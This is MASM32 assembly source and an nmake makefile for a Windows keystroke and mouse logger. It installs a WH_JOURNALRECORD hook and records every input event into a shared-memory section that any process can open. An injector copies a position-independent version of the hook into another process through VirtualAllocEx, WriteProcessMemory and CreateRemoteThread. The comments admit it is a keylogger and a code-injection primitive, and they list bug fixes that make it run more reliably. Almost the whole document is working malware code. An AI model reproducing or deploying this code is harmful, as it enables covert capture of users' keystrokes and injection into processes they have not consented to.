
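; ---------------------------------------------------------------------
; Stand-alone journal-record hook test (MASM32, x86, stdcall).
;
; Installs a WH_JOURNALRECORD hook and appends every recorded input
; event to a named shared-memory section ("MMF") that another process
; can open by name.  A journal hook sees ALL keyboard and mouse input on
; the desktop -- it is a keylogger primitive -- so keep this to machines
; you are authorised to test on.
;
; Changes versus the original listing:
;   * the section is pagefile-backed (INVALID_HANDLE_VALUE) instead of a
;     regular file called "MMF" in the working directory, so captured
;     input is no longer persisted to disk and no file handle leaks;
;   * HookProc writes THROUGH lpMemory (the original `mov [lpMemory],eax`
;     overwrote the pointer variable itself) and wraps inside the 4 KiB
;     section instead of advancing the pointer without bound;
;   * Sharing is called once, from WM_INITDIALOG, not on every event.
;
; NOTE(review): the section name carries no "Local\" prefix and the
; security descriptor is NULL, so any process in the session can open
; it and read the captured input.  NOTE(review): on Windows Vista and
; later journal hooks are restricted; expect SetWindowsHookEx to fail
; with ERROR_ACCESS_DENIED unless the process has uiAccess -- confirm.
; ---------------------------------------------------------------------
                .386
                .model  flat, stdcall
                option  casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Includes
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include         windows.inc
include         user32.inc
includelib      user32.lib
include         kernel32.inc
includelib      kernel32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equates
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN        equ     1000
DLG_MAIN        equ     1000
IDC_TEXT        equ     1001
WM_HOOK         equ     WM_USER + 100h

; Layout of the shared section (all little-endian DWORDs):
;   [0]                      index of the next free record slot (wraps)
;   [4 + i*MMF_RECSIZE]      record i, i = 0 .. MMF_RECORDS-1
; record = { DWORD code, DWORD wParam, EVENTMSG evt }
; (EVENTMSG is the 5-DWORD struct from windows.inc.)
MMF_SIZE        equ     4096
MMF_RECSIZE     equ     2 * sizeof DWORD + sizeof EVENTMSG
MMF_RECORDS     equ     (MMF_SIZE - sizeof DWORD) / MMF_RECSIZE
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Data
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                .data?
hWinMain        dd      ?               ; main dialog, owner of error boxes
hInstance       dd      ?
hHook           dd      ?               ; 0 while no hook is installed
hFileMap        dd      ?               ; 0 while no section is open
lpMemory        dd      ?               ; base of the mapped view, 0 if none

                .const
szMMFName       db      'MMF',0
szErr           db      '创建文件内存映射失败',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Sharing: open the named section, creating it if it does not exist,
; and map a writable view of it.
; Returns eax = view base (also stored in lpMemory), or 0 after showing
; szErr.  Idempotent: when a view is already mapped it is returned
; as-is, so repeated calls do not leak handles.
; A freshly created pagefile-backed section is zero-filled, so the
; record index starts at 0 without an explicit store.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Sharing         proc
                mov     eax,lpMemory
                .if     eax
                        ret                     ; already mapped
                .endif
                invoke  OpenFileMapping,FILE_MAP_READ or FILE_MAP_WRITE,FALSE,addr szMMFName
                .if     ! eax
                        ; nobody created it yet: create a pagefile-backed one
                        invoke  CreateFileMapping,INVALID_HANDLE_VALUE,NULL,PAGE_READWRITE,\
                                0,MMF_SIZE,addr szMMFName
                        .if     ! eax
                                jmp     _fail
                        .endif
                .endif
                mov     hFileMap,eax
                invoke  MapViewOfFile,eax,FILE_MAP_WRITE,0,0,0
                .if     eax
                        mov     lpMemory,eax
                        ret
                .endif
                invoke  CloseHandle,hFileMap    ; view failed: drop the section handle
                mov     hFileMap,0
_fail:
                invoke  MessageBox,hWinMain,addr szErr,NULL,MB_OK
                xor     eax,eax
                ret
Sharing         endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Unshare: release the view and the section handle (no-op for either
; that is not open).  Safe to call more than once.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Unshare         proc
                .if     lpMemory
                        invoke  UnmapViewOfFile,lpMemory
                        mov     lpMemory,0
                .endif
                .if     hFileMap
                        invoke  CloseHandle,hFileMap
                        mov     hFileMap,0
                .endif
                ret
Unshare         endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; HookProc: WH_JOURNALRECORD callback.
; Stores one record per event in the shared section as a ring buffer
; (layout above).  For HC_ACTION, _lParam points at an EVENTMSG that is
; only valid inside this process, so the struct is copied rather than
; the pointer (the original stored the raw lParam, which is useless to
; a reader in another process).  The slot index is published only after
; the record is completely written.
; Returns 0; the return value of a journal-record hook is ignored
; except for code < 0, where CallNextHookEx's result is passed back.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HookProc        proc    uses esi edi _dwCode,_wParam,_lParam
                local   @next:DWORD
                mov     eax,_dwCode
                .if     sdword ptr eax < 0
                        ; hook contract: pass through without processing
                        invoke  CallNextHookEx,hHook,_dwCode,_wParam,_lParam
                        ret
                .endif
                invoke  CallNextHookEx,hHook,_dwCode,_wParam,_lParam
                mov     edx,lpMemory
                .if     edx                     ; no view mapped: drop the event
                        mov     eax,[edx]       ; next slot index
                        .if     eax >= MMF_RECORDS
                                xor     eax,eax ; wrap around
                        .endif
                        imul    ecx,eax,MMF_RECSIZE
                        lea     edi,[edx + ecx + sizeof DWORD]   ; -> record[eax]
                        inc     eax
                        mov     @next,eax
                        mov     eax,_dwCode
                        stosd
                        mov     eax,_wParam
                        stosd
                        .if     _dwCode == HC_ACTION
                                mov     esi,_lParam             ; EVENTMSG*
                                mov     ecx,sizeof EVENTMSG / sizeof DWORD
                                rep     movsd
                        .else
                                xor     eax,eax                 ; no EVENTMSG for this code
                                mov     ecx,sizeof EVENTMSG / sizeof DWORD
                                rep     stosd
                        .endif
                        mov     edx,lpMemory
                        mov     eax,@next
                        mov     [edx],eax       ; publish the finished record
                .endif
                xor     eax,eax
                ret
HookProc        endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _ProcDlgMain: dialog procedure of the (otherwise empty) main dialog.
; WM_INITDIALOG maps the section and installs the hook; WM_CLOSE
; removes the hook before releasing the buffer it writes to.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain    proc    uses ebx edi esi hWnd,wMsg,wParam,lParam
                mov     eax,wMsg
;********************************************************************
                .if     eax == WM_CLOSE
                        .if     hHook
                                invoke  UnhookWindowsHookEx,hHook
                                mov     hHook,0
                        .endif
                        invoke  Unshare
                        invoke  EndDialog,hWnd,NULL
;********************************************************************
                .elseif eax == WM_INITDIALOG
                        push    hWnd
                        pop     hWinMain
                        invoke  Sharing         ; HookProc needs lpMemory before the first event
                        .if     ! eax
                                invoke  EndDialog,hWnd,-1
                        .else
                                invoke  SetWindowsHookEx,WH_JOURNALRECORD,addr HookProc,hInstance,NULL
                                .if     eax
                                        mov     hHook,eax
                                .else
                                        ; ERROR_ACCESS_DENIED here usually means journal
                                        ; hooks are not permitted for this process
                                        invoke  Unshare
                                        invoke  EndDialog,hWnd,NULL
                                .endif
                        .endif
;********************************************************************
                .else
                        mov     eax,FALSE
                        ret
                .endif
                mov     eax,TRUE
                ret
_ProcDlgMain    endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Entry point: run the modal dialog, then exit.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
                invoke  GetModuleHandle,NULL
                mov     hInstance,eax
                invoke  DialogBoxParam,eax,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
                invoke  ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                end     start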
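; ---------------------------------------------------------------------
; RemoteCode.asm -- position-independent blob that the injector
; (RemoteThd) copies into the target process.  The injector allocates
; REMOTE_CODE_LENGTH bytes there, copies [REMOTE_CODE_START,
; REMOTE_CODE_END), overwrites the first three DWORDs with the
; addresses of LoadLibraryA / GetProcAddress / GetModuleHandleA, and
; starts _RemoteThread.  Inside the target the blob installs a
; WH_JOURNALRECORD hook and mirrors the events into the named section
; "MMF" (same layout as the stand-alone test program).
;
; Every access to the blob's own data and code goes through ebx, which
; each proc recomputes with the call/pop trick (ebx = run address -
; link address).  The original listing had several absolute accesses
; (`add _lpMemory,4`, `pop _hWinMain`, `[ebx + hWnd]` on a stack arg)
; which touch the injector's image, not the copy, and fault or corrupt
; memory in the host; all are ebx-relative or plain stack accesses now.
;
; Other fixes versus the original listing:
;   * import names: GetProcAddress is given the real export names
;     (DialogBoxParamA, MessageBoxA, SetWindowsHookExA,
;     OpenFileMappingA, CreateFileMappingA); the suffix-less names are
;     not exported, so every lookup returned NULL and the first call
;     through the table crashed the host;
;   * every GetProcAddress result is checked before use;
;   * _WinMain (stdcall, one argument, `ret 4`) is entered with invoke,
;     not `call`, which left the stack unbalanced in _RemoteThread;
;   * ecx was reused as the section-name pointer across an API call
;     that clobbers it; the pointer is recomputed instead;
;   * the section is pagefile-backed, no "MMF" file is created.
;
; The variables live inside the blob, which is why the injector has to
; map it PAGE_EXECUTE_READWRITE.
; NOTE(review): _invoke comes from Macro.inc (not shown).  This code
; assumes it pushes its arguments right-to-left unmodified and then
; executes `call dword ptr [...]`; eax/ecx are passed as arguments and
; must survive until pushed -- confirm against the macro.
; ---------------------------------------------------------------------

; Shared-section layout (mirrors the test program):
;   [0]                      index of the next free record slot (wraps)
;   [4 + i*MMF_RECSIZE]      record i, i = 0 .. MMF_RECORDS-1
; record = { DWORD code, DWORD wParam, EVENTMSG evt }
MMF_SIZE        equ     4096
MMF_RECSIZE     equ     2 * sizeof DWORD + sizeof EVENTMSG
MMF_RECORDS     equ     (MMF_SIZE - sizeof DWORD) / MMF_RECSIZE

REMOTE_CODE_START       equ     this byte
;--- bootstrap table: written by the injector at offset 0 of the blob.
;    Order and position are the injector's contract -- do not reorder.
_lpLoadLibrary          dd      ?
_lpGetProcAddress       dd      ?
_lpGetModuleHandle      dd      ?
;--- state of the injected code (lives in the blob itself)
_hWinMain               dd      ?
_hInstance              dd      ?
_hHook                  dd      ?
_hFileMap               dd      ?
_lpMemory               dd      ?
_szMMFName              db      'MMF',0
_szErr                  db      '创建文件内存映射失败',0
;--- resolved imports: one slot per name in the tables below, same order
_lpDialogBoxParam       dd      ?
_lpEndDialog            dd      ?
_lpMessageBox           dd      ?
_lpCallNextHookEx       dd      ?
_lpSetWindowsHookEx     dd      ?
_lpUnhookWindowsHookEx  dd      ?
;=================================
_lpOpenFileMapping      dd      ?
_lpCreateFileMapping    dd      ?
_lpMapViewOfFile        dd      ?
_lpCloseHandle          dd      ?
_lpUnmapViewOfFile      dd      ?
;--- export-name tables: each name NUL-terminated, list ends with an
;    extra NUL.  ANSI entry points are named explicitly because these
;    strings go to GetProcAddress, which knows nothing of the A/W
;    aliases used by the include files.
_szDllUser              db      'User32.dll',0
_szDialogBoxParam       db      'DialogBoxParamA',0
_szEndDialog            db      'EndDialog',0
_szMessageBox           db      'MessageBoxA',0
_szCallNextHookEx       db      'CallNextHookEx',0
_szSetWindowsHookEx     db      'SetWindowsHookExA',0
_szUnhookWindowsHookEx  db      'UnhookWindowsHookEx',0,0
;===========================================================
_szDllKernel            db      'Kernel32.dll',0
_szOpenFileMapping      db      'OpenFileMappingA',0
_szCreateFileMapping    db      'CreateFileMappingA',0
_szMapViewOfFile        db      'MapViewOfFile',0
_szCloseHandle          db      'CloseHandle',0
_szUnmapViewOfFile      db      'UnmapViewOfFile',0,0
;=================================================================
; _ResolveImports: fill a table of function pointers from a
; double-NUL-terminated list of export names.
;   hModule - module to look the names up in
;   lpNames - 'name1',0,'name2',0,...,0,0
;   lpTable - DWORD slots, filled in the same order
; Returns eax = TRUE when every name resolved, FALSE at the first one
; GetProcAddress cannot find (a NULL slot would crash the host later).
_ResolveImports proc    uses ebx esi edi hModule,lpNames,lpTable
                call    @F
@@:             pop     ebx
                sub     ebx,offset @B
                mov     esi,lpNames
                mov     edi,lpTable
                .while  byte ptr [esi]
                        _invoke [ebx + _lpGetProcAddress],hModule,esi
                        .if     ! eax
                                ret             ; eax = 0: not exported
                        .endif
                        stosd                   ; store pointer, edi += 4
@@:                     lodsb
                        or      al,al
                        jnz     @B              ; skip past this name's NUL
                .endw
                mov     eax,TRUE
                ret
_ResolveImports endp
;=================================================================
; _Sharing: open (or create) the named section and map a writable view.
; Returns eax = view base (also in _lpMemory) or 0 after showing _szErr.
; Idempotent: returns the existing view when one is already mapped.
_Sharing        proc    uses ebx edi esi
                call    @F
@@:             pop     ebx
                sub     ebx,offset @B
;====================================
                mov     eax,[ebx + _lpMemory]
                .if     eax
                        ret                     ; already mapped
                .endif
                lea     eax,[ebx + offset _szMMFName]
                _invoke [ebx + _lpOpenFileMapping],FILE_MAP_READ or FILE_MAP_WRITE,FALSE,eax
                .if     ! eax
                        ; ecx/edx are caller-saved and were clobbered by the call
                        ; above: recompute the name pointer instead of reusing a reg
                        lea     eax,[ebx + offset _szMMFName]
                        _invoke [ebx + _lpCreateFileMapping],INVALID_HANDLE_VALUE,NULL,PAGE_READWRITE,\
                                0,MMF_SIZE,eax
                        .if     ! eax
                                jmp     _fail
                        .endif
                .endif
                mov     [ebx + _hFileMap],eax
                _invoke [ebx + _lpMapViewOfFile],eax,FILE_MAP_WRITE,0,0,0
                .if     eax
                        mov     [ebx + _lpMemory],eax
                        ret
                .endif
                _invoke [ebx + _lpCloseHandle],[ebx + _hFileMap]
                mov     [ebx + _hFileMap],0
_fail:
                lea     eax,[ebx + offset _szErr]
                _invoke [ebx + _lpMessageBox],[ebx + _hWinMain],eax,NULL,MB_OK
                xor     eax,eax
                ret
_Sharing        endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _Unshare: release the view and the section handle; safe to call when
; neither is open and safe to call twice.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Unshare        proc    uses ebx edi esi
                call    @F
@@:             pop     ebx
                sub     ebx,offset @B
;===============================
                mov     eax,[ebx + _lpMemory]
                .if     eax
                        _invoke [ebx + _lpUnmapViewOfFile],eax
                        mov     [ebx + _lpMemory],0
                .endif
                mov     eax,[ebx + _hFileMap]
                .if     eax
                        _invoke [ebx + _lpCloseHandle],eax
                        mov     [ebx + _hFileMap],0
                .endif
                ret
_Unshare        endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _HookProc: WH_JOURNALRECORD callback running inside the host.
; Appends {code, wParam, EVENTMSG} records to the shared section as a
; ring buffer; for HC_ACTION the EVENTMSG that _lParam points at is
; copied, since the pointer itself means nothing to another process.
; The slot index is published only after the record is complete.
; Returns 0, or CallNextHookEx's result when code < 0 (hook contract).
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_HookProc       proc    uses ebx esi edi _dwCode,_wParam,_lParam
                local   @next:DWORD
                call    @F
@@:             pop     ebx
                sub     ebx,offset @B
;======================
                mov     eax,_dwCode
                .if     sdword ptr eax < 0
                        _invoke [ebx + _lpCallNextHookEx],[ebx + _hHook],_dwCode,_wParam,_lParam
                        ret
                .endif
                _invoke [ebx + _lpCallNextHookEx],[ebx + _hHook],_dwCode,_wParam,_lParam
                mov     edx,[ebx + _lpMemory]
                .if     edx                     ; no view: drop the event
                        mov     eax,[edx]       ; next slot index
                        .if     eax >= MMF_RECORDS
                                xor     eax,eax ; wrap around
                        .endif
                        imul    ecx,eax,MMF_RECSIZE
                        lea     edi,[edx + ecx + sizeof DWORD]   ; -> record[eax]
                        inc     eax
                        mov     @next,eax
                        mov     eax,_dwCode
                        stosd
                        mov     eax,_wParam
                        stosd
                        .if     _dwCode == HC_ACTION
                                mov     esi,_lParam             ; EVENTMSG*
                                mov     ecx,sizeof EVENTMSG / sizeof DWORD
                                rep     movsd
                        .else
                                xor     eax,eax
                                mov     ecx,sizeof EVENTMSG / sizeof DWORD
                                rep     stosd
                        .endif
                        mov     edx,[ebx + _lpMemory]
                        mov     eax,@next
                        mov     [edx],eax       ; publish the finished record
                .endif
                xor     eax,eax
                ret
_HookProc       endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _ProcDlgMain: dialog procedure run inside the host.  WM_INITDIALOG
; maps the section and installs the hook; WM_CLOSE removes the hook
; before releasing the buffer it writes to.  hWnd is a stack argument
; and is used as such (never ebx-relative).
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain    proc    uses ebx edi esi hWnd,wMsg,wParam,lParam
                call    @F
@@:             pop     ebx
                sub     ebx,offset @B
;==============================
                mov     eax,wMsg
;********************************************************************
                .if     eax == WM_CLOSE
                        mov     eax,[ebx + _hHook]
                        .if     eax
                                _invoke [ebx + _lpUnhookWindowsHookEx],eax
                                mov     [ebx + _hHook],0
                        .endif
                        invoke  _Unshare
                        _invoke [ebx + _lpEndDialog],hWnd,NULL
;********************************************************************
                .elseif eax == WM_INITDIALOG
                        mov     eax,hWnd
                        mov     [ebx + _hWinMain],eax
                        invoke  _Sharing                ; _HookProc needs _lpMemory first
                        .if     ! eax
                                _invoke [ebx + _lpEndDialog],hWnd,-1
                        .else
                                lea     eax,[ebx + offset _HookProc]
                                _invoke [ebx + _lpSetWindowsHookEx],WH_JOURNALRECORD,eax,[ebx + _hInstance],NULL
                                .if     eax
                                        mov     [ebx + _hHook],eax
                                .else
                                        invoke  _Unshare
                                        _invoke [ebx + _lpEndDialog],hWnd,NULL
                                .endif
                        .endif
;********************************************************************
                .else
                        mov     eax,FALSE
                        ret
                .endif
                mov     eax,TRUE
                ret
_ProcDlgMain    endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _WinMain: run the modal dialog inside the host (a journal hook needs
; a message loop in the installing thread; the dialog provides it).
; NOTE(review): DLG_MAIN is looked up in the HOST's module -- the
; hInstance below is the target exe's, while the dialog template lives
; in the injector.  Unless the target image happens to carry a dialog
; resource with ID 1000, DialogBoxParam returns -1 and the hook is
; never installed -- confirm; a plain GetMessage loop would avoid the
; resource dependency.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WinMain        proc    uses ebx edi esi _lParam
                call    @F
@@:             pop     ebx
                sub     ebx,offset @B
;========================
                _invoke [ebx + _lpGetModuleHandle],NULL
                mov     [ebx + _hInstance],eax
                lea     ecx,[ebx + offset _ProcDlgMain]
                _invoke [ebx + _lpDialogBoxParam],eax,DLG_MAIN,NULL,ecx,NULL
                ret
_WinMain        endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _RemoteThread: thread entry started by CreateRemoteThread in the host.
; Resolves every import the blob needs, then runs _WinMain.  Any
; unresolved name makes the thread return quietly (exit code 0) rather
; than calling through a NULL slot.  LoadLibrary is used instead of
; GetModuleHandle so the lookup also works when the host has not
; loaded the DLL yet; loading it twice only bumps the reference count.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RemoteThread   proc    uses ebx edi esi lParam
                local   @hModuleU:DWORD
                local   @hModuleK:DWORD
                call    @F
@@:             pop     ebx
                sub     ebx,offset @B
;********************************************************************
                _invoke [ebx + _lpGetModuleHandle],NULL
                mov     [ebx + _hInstance],eax
                lea     eax,[ebx + offset _szDllUser]
                _invoke [ebx + _lpLoadLibrary],eax
                .if     ! eax
                        ret
                .endif
                mov     @hModuleU,eax
                lea     eax,[ebx + offset _szDllKernel]
                _invoke [ebx + _lpLoadLibrary],eax
                .if     ! eax
                        ret
                .endif
                mov     @hModuleK,eax
;=========================================
                lea     esi,[ebx + offset _szDialogBoxParam]
                lea     edi,[ebx + offset _lpDialogBoxParam]
                invoke  _ResolveImports,@hModuleU,esi,edi
                .if     ! eax
                        ret
                .endif
                lea     esi,[ebx + offset _szOpenFileMapping]
                lea     edi,[ebx + offset _lpOpenFileMapping]
                invoke  _ResolveImports,@hModuleK,esi,edi
                .if     ! eax
                        ret
                .endif
;********************************************************************
                ; invoke, not `call`: _WinMain is stdcall with one argument
                ; and returns with `ret 4`
                invoke  _WinMain,lParam
                xor     eax,eax
                ret
_RemoteThread   endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
REMOTE_CODE_END         equ     this byte
REMOTE_CODE_LENGTH      equ     offset REMOTE_CODE_END - offset REMOTE_CODE_START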

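; ---------------------------------------------------------------------
; RemoteThd: copies the position-independent blob from RemoteCode.asm
; into the process that owns the window with class 'Menu' and title
; 'Menu' and starts it with CreateRemoteThread.  Inside that process the
; blob installs a WH_JOURNALRECORD hook (see RemoteCode.asm).
;
; Assumptions (32-bit MASM32 build):
;   * the target is a 32-bit process of the same session, so the three
;     kernel32 addresses resolved here are valid there too (system DLLs
;     share one base across processes; with ASLR that base changes per
;     boot, not per process -- confirm for the target OS);
;   * the caller may open the target: OpenProcess fails for another
;     user's process or a higher integrity level.
; This is a classic code-injection primitive; use it only on systems
; you are authorised to test.
;
; Fixes versus the original listing: FindWindow, OpenProcess, both
; WriteProcessMemory calls and CreateRemoteThread are checked; the
; remote allocation is released on failure; the thread handle is
; closed; the "OK" box is shown after the thread was actually created;
; the `call @F` used as a jump is gone; OpenProcess asks for the rights
; CreateRemoteThread documents as required.
; ---------------------------------------------------------------------
                .386
                .model  flat,stdcall
                option  casemap:none
include         windows.inc
include         user32.inc
includelib      user32.lib
include         kernel32.inc
includelib      kernel32.lib
include         Macro.inc

ICO_MAIN        equ     1000
DLG_MAIN        equ     1000
WM_HOOK         equ     WM_USER + 100h
BOOTSTRAP_SIZE  equ     3 * sizeof dword        ; the three pointers copied into the blob

                .data?
; These three must stay contiguous and in this order: they are written
; as one 12-byte block over the first three DWORDs of the remote blob.
lpLoadLibrary           dd      ?
lpGetProcAddress        dd      ?
lpGetModuleHandle       dd      ?
dwProcessID             dd      ?
dwThreadID              dd      ?
hProcess                dd      ?
lpRemoteCode            dd      ?               ; base of the blob in the target
dwTmp                   dd      ?               ; bytes written by WriteProcessMemory

                .const
szOK            db      'OK了',0
szErrOpen       db      '无法打开远程线程!或无法植入!',0
szDesktopClass  db      'Menu',0
szDesktopWindow db      'Menu',0
szDllKernel     db      'kernel32.dll',0
szLoadLibrary   db      'LoadLibraryA',0
szGetProcAddress db     'GetProcAddress',0
szGetModuleHandle db    'GetModuleHandleA',0

                .code
include         RemoteCode.asm          ; the blob, assembled in place
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Entry point.  Every failure path shows szErrOpen and exits; nothing
; is left allocated in the target unless the remote thread was started.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
                ; bootstrap addresses handed to the blob
                invoke  GetModuleHandle,addr szDllKernel
                mov     ebx,eax
                invoke  GetProcAddress,ebx,offset szLoadLibrary
                mov     lpLoadLibrary,eax
                invoke  GetProcAddress,ebx,offset szGetProcAddress
                mov     lpGetProcAddress,eax
                invoke  GetProcAddress,ebx,offset szGetModuleHandle
                mov     lpGetModuleHandle,eax

                ; locate the target process through its window
                invoke  FindWindow,addr szDesktopClass,addr szDesktopWindow
                .if     ! eax
                        jmp     _fail                   ; no such window
                .endif
                invoke  GetWindowThreadProcessId,eax,offset dwProcessID
                mov     dwThreadID,eax
                ; CreateRemoteThread's documentation lists these five rights
                invoke  OpenProcess,PROCESS_CREATE_THREAD or PROCESS_QUERY_INFORMATION or \
                        PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_VM_READ,\
                        FALSE,dwProcessID
                .if     ! eax
                        jmp     _fail
                .endif
                mov     hProcess,eax

                ; RWX is unavoidable with this blob: its variables live inside
                ; it and are written by the remote code.  Moving the data into a
                ; separate PAGE_READWRITE allocation would allow RX here.
                invoke  VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,\
                        MEM_COMMIT,PAGE_EXECUTE_READWRITE
                .if     ! eax
                        jmp     _fail_close
                .endif
                mov     lpRemoteCode,eax

                ; 1) the whole blob, 2) the three bootstrap pointers over its
                ; first three DWORDs (lpRemoteCode deliberately not advanced)
                invoke  WriteProcessMemory,hProcess,lpRemoteCode,\
                        offset REMOTE_CODE_START,REMOTE_CODE_LENGTH,offset dwTmp
                .if     (! eax) || (dwTmp != REMOTE_CODE_LENGTH)
                        jmp     _fail_free
                .endif
                invoke  WriteProcessMemory,hProcess,lpRemoteCode,\
                        offset lpLoadLibrary,BOOTSTRAP_SIZE,offset dwTmp
                .if     (! eax) || (dwTmp != BOOTSTRAP_SIZE)
                        jmp     _fail_free
                .endif
                invoke  FlushInstructionCache,hProcess,lpRemoteCode,REMOTE_CODE_LENGTH

                ; thread start = blob base + offset of _RemoteThread within it
                mov     eax,lpRemoteCode
                add     eax,offset _RemoteThread - offset REMOTE_CODE_START
                invoke  CreateRemoteThread,hProcess,NULL,0,eax,0,0,NULL
                .if     ! eax
                        jmp     _fail_free
                .endif
                invoke  CloseHandle,eax                 ; thread handle: never waited on
                invoke  CloseHandle,hProcess
                invoke  MessageBox,NULL,addr szOK,NULL,MB_OK or MB_ICONWARNING
                invoke  ExitProcess,NULL

_fail_free:
                invoke  VirtualFreeEx,hProcess,lpRemoteCode,0,MEM_RELEASE
_fail_close:
                invoke  CloseHandle,hProcess
_fail:
                invoke  MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING
                invoke  ExitProcess,NULL
                end     start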

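# nmake makefile for the RemoteThd injector (MASM32 toolchain).
#   nmake          build $(NAME).exe
#   nmake clean    remove intermediates
NAME = RemoteThd
OBJS = $(NAME).obj
RES = $(NAME).res
LINK_FLAG = /subsystem:windows
ML_FLAG = /c /coff

# First target is the default.
$(NAME).exe: $(OBJS) $(RES)
	Link $(LINK_FLAG) $(OBJS) $(RES)

# The injector source includes RemoteCode.asm; without this explicit
# dependency a change to the blob alone did not trigger a rebuild.
# (Macro.inc is also included but is assumed to come from the
# assembler's include path, so it is not listed -- add it if local.)
$(NAME).obj: $(NAME).asm RemoteCode.asm
	ml $(ML_FLAG) $(NAME).asm

# Inference rules for any other .asm / .rc in the directory.
.asm.obj:
	ml $(ML_FLAG) $<

.rc.res:
	rc $<

clean:
	del *.obj
	del *.res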

 

 
